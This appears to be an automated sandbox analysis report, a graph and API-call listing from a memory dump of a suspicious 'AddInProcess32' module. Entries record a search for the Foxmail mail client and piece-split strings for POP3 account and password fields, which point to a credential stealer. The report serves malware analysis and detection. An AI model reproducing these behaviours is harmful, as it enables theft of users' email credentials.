7384 1000a0b9 7383->7384 7385 1000a0ce 7383->7385 7386 10006368 _free 20 API calls 
7384->7386 7394 1000a0c9 _abort 7385->7394 7398 10007b94 RtlEnterCriticalSection 7385->7398 7388 1000a0be 7386->7388 7390 100062ac _abort 26 API calls 7388->7390 7389 1000a0ea 7399 1000a026 7389->7399 7390->7394 7392 1000a0f5 7415 1000a112 7392->7415 7394->7351 7490 100056b9 RtlLeaveCriticalSection 7395->7490 7397 1000907a 7397->7354 7398->7389 7400 1000a033 7399->7400 7401 1000a048 7399->7401 7402 10006368 _free 20 API calls 7400->7402 7407 1000a043 7401->7407 7418 10008e12 7401->7418 7403 1000a038 7402->7403 7405 100062ac _abort 26 API calls 7403->7405 7405->7407 7407->7392 7408 1000907c 20 API calls 7409 1000a064 7408->7409 7424 10007a5a 7409->7424 7411 1000a06a 7431 1000adce 7411->7431 7414 1000571e _free 20 API calls 7414->7407 7489 10007ba8 RtlLeaveCriticalSection 7415->7489 7417 1000a11a 7417->7394 7419 10008e26 7418->7419 7420 10008e2a 7418->7420 7419->7408 7420->7419 7421 10007a5a 26 API calls 7420->7421 7422 10008e4a 7421->7422 7446 10009a22 7422->7446 7425 10007a66 7424->7425 7426 10007a7b 7424->7426 7427 10006368 _free 20 API calls 7425->7427 7426->7411 7428 10007a6b 7427->7428 7429 100062ac _abort 26 API calls 7428->7429 7430 10007a76 7429->7430 7430->7411 7432 1000adf2 7431->7432 7433 1000addd 7431->7433 7434 1000ae2d 7432->7434 7438 1000ae19 7432->7438 7435 10006355 __dosmaperr 20 API calls 7433->7435 7436 10006355 __dosmaperr 20 API calls 7434->7436 7437 1000ade2 7435->7437 7439 1000ae32 7436->7439 7440 10006368 _free 20 API calls 7437->7440 7473 1000ada6 7438->7473 7442 10006368 _free 20 API calls 7439->7442 7443 1000a070 7440->7443 7444 1000ae3a 7442->7444 7443->7407 7443->7414 7445 100062ac _abort 26 API calls 7444->7445 7445->7443 7447 10009a2e ___scrt_is_nonwritable_in_current_image 7446->7447 7448 10009a36 7447->7448 7449 10009a4e 7447->7449 7450 10006355 __dosmaperr 20 API calls 7448->7450 7451 10009aec 7449->7451 7454 10009a83 7449->7454 7453 10009a3b 7450->7453 7452 10006355 __dosmaperr 20 API calls 7451->7452 7455 10009af1 7452->7455 7456 
10006368 _free 20 API calls 7453->7456 7468 10008c7b RtlEnterCriticalSection 7454->7468 7458 10006368 _free 20 API calls 7455->7458 7463 10009a43 _abort 7456->7463 7460 10009af9 7458->7460 7459 10009a89 7462 10006368 _free 20 API calls 7459->7462 7466 10009ab5 7459->7466 7461 100062ac _abort 26 API calls 7460->7461 7461->7463 7464 10009aaa 7462->7464 7463->7419 7465 10006355 __dosmaperr 20 API calls 7464->7465 7465->7466 7469 10009ae4 7466->7469 7468->7459 7472 10008c9e RtlLeaveCriticalSection 7469->7472 7471 10009aea 7471->7463 7472->7471 7476 1000ad24 7473->7476 7475 1000adca 7475->7443 7477 1000ad30 ___scrt_is_nonwritable_in_current_image 7476->7477 7484 10008c7b RtlEnterCriticalSection 7477->7484 7479 1000ad3e 7480 1000ad65 7479->7480 7481 10006368 _free 20 API calls 7479->7481 7485 1000ad9a 7480->7485 7481->7480 7483 1000ad8d _abort 7483->7475 7484->7479 7488 10008c9e RtlLeaveCriticalSection 7485->7488 7487 1000ada4 7487->7483 7488->7487 7489->7417 7490->7397 6524 10002049 6525 10002055 ___scrt_is_nonwritable_in_current_image 6524->6525 6526 100020d3 6525->6526 6527 1000207d 6525->6527 6537 1000205e 6525->6537 6559 10002639 IsProcessorFeaturePresent 6526->6559 6538 1000244c 6527->6538 6530 100020da 6531 10002082 6547 10002308 6531->6547 6533 10002087 __RTC_Initialize 6550 100020c4 6533->6550 6535 1000209f 6553 1000260b 6535->6553 6539 10002451 ___scrt_release_startup_lock 6538->6539 6540 10002455 6539->6540 6543 10002461 6539->6543 6541 1000527a _abort 20 API calls 6540->6541 6542 1000245f 6541->6542 6542->6531 6544 1000246e 6543->6544 6545 1000499b _abort 28 API calls 6543->6545 6544->6531 6546 10004bbd 6545->6546 6546->6531 6563 100034c7 RtlInterlockedFlushSList 6547->6563 6549 10002312 6549->6533 6565 1000246f 6550->6565 6552 100020c9 ___scrt_release_startup_lock 6552->6535 6554 10002617 6553->6554 6555 1000262d 6554->6555 6606 100053ed 6554->6606 6555->6537 6560 1000264e ___scrt_fastfail 6559->6560 6561 100026f9 IsDebuggerPresent 

Control-flow Graph

APIs
• lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
• lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
• FindClose.KERNEL32(00000000), ref: 100011DB
Memory Dump Source
• Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
Similarity
• API ID: lstrlen$Find$File$CloseFirstNextlstrcat
• String ID:
• API String ID: 1083526818-0
• Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
• Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
• Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
• Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

Control-flow Graph

APIs
• GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
  • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
  • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
  • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
  • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
• lstrlenW.KERNEL32(?), ref: 100014C5
• lstrlenW.KERNEL32(?), ref: 100014E0
• lstrlenW.KERNEL32(?,?), ref: 1000150F
• lstrcatW.KERNEL32(00000000), ref: 10001521
• lstrlenW.KERNEL32(?,?), ref: 10001547
• lstrcatW.KERNEL32(00000000), ref: 10001553
• lstrlenW.KERNEL32(?,?), ref: 10001579
• lstrcatW.KERNEL32(00000000), ref: 10001585
• lstrlenW.KERNEL32(?,?), ref: 100015AB
• lstrcatW.KERNEL32(00000000), ref: 100015B7
Strings
Memory Dump Source
• Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
Similarity
• API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
• String ID: )$Foxmail$ProgramFiles
• API String ID: 672098462-2938083778
• Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
• Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
• Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
• Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                  • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                    • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                    • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                    • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 2099061454-0

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                    • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                    • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                    • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                    • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 2099061454-0

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                                                  • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                  • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                  • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                  • String ID:
                                                                                                  • API String ID: 2152742572-0
                                                                                                  APIs
                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                  • String ID:
                                                                                                  • API String ID: 3906539128-0
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                                                                  • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                                                                  • ExitProcess.KERNEL32 ref: 10004AEE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                  • String ID:
                                                                                                  • API String ID: 1703294689-0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: HeapProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 54951025-0

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                    • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                    • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                  • _strlen.LIBCMT ref: 10001855
                                                                                                  • _strlen.LIBCMT ref: 10001869
                                                                                                  • _strlen.LIBCMT ref: 1000188B
                                                                                                  • _strlen.LIBCMT ref: 100018AE
                                                                                                  • _strlen.LIBCMT ref: 100018C8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _strlen$File$CopyCreateDelete
                                                                                                  • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                  • API String ID: 3296212668-3023110444

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _strlen
                                                                                                  • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                  • API String ID: 4218353326-230879103

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                                                                    • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                                                                  • _free.LIBCMT ref: 10007CFB
                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                  • _free.LIBCMT ref: 10007D1D
                                                                                                  • _free.LIBCMT ref: 10007D32
                                                                                                  • _free.LIBCMT ref: 10007D3D
                                                                                                  • _free.LIBCMT ref: 10007D5F
                                                                                                  • _free.LIBCMT ref: 10007D72
                                                                                                  • _free.LIBCMT ref: 10007D80
                                                                                                  • _free.LIBCMT ref: 10007D8B
                                                                                                  • _free.LIBCMT ref: 10007DC3
                                                                                                  • _free.LIBCMT ref: 10007DCA
                                                                                                  • _free.LIBCMT ref: 10007DE7
                                                                                                  • _free.LIBCMT ref: 10007DFF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                  • String ID:
                                                                                                  • API String ID: 161543041-0
                                                                                                  • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                  • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                                                                                                  • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                                                                                                  • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 100059EA
                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                  • _free.LIBCMT ref: 100059F6
                                                                                                  • _free.LIBCMT ref: 10005A01
                                                                                                  • _free.LIBCMT ref: 10005A0C
                                                                                                  • _free.LIBCMT ref: 10005A17
                                                                                                  • _free.LIBCMT ref: 10005A22
                                                                                                  • _free.LIBCMT ref: 10005A2D
                                                                                                  • _free.LIBCMT ref: 10005A38
                                                                                                  • _free.LIBCMT ref: 10005A43
                                                                                                  • _free.LIBCMT ref: 10005A51
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                  • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                  • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                  • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                  • String ID:
                                                                                                  • API String ID: 1454806937-0
                                                                                                  • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                  • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                  • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                  • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetConsoleCP.KERNEL32 ref: 100094D4
                                                                                                  • __fassign.LIBCMT ref: 1000954F
                                                                                                  • __fassign.LIBCMT ref: 1000956A
                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 100095AF
                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 100095E8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 1324828854-0
                                                                                                  • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                  • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                                                                  • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                                                                  • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000015.00000002.3086982227.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000015.00000002.3087096297.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_21_2_10000000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                  • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                  • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                                  • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                                  • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                  • _free.LIBCMT ref: 100092AB
                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                  • _free.LIBCMT ref: 100092B6
                                                                                                  • _free.LIBCMT ref: 100092C1
                                                                                                  • _free.LIBCMT ref: 10009315
                                                                                                  • _free.LIBCMT ref: 10009320
                                                                                                  • _free.LIBCMT ref: 1000932B
                                                                                                  • _free.LIBCMT ref: 10009336
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000015.00000002.3087096297.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
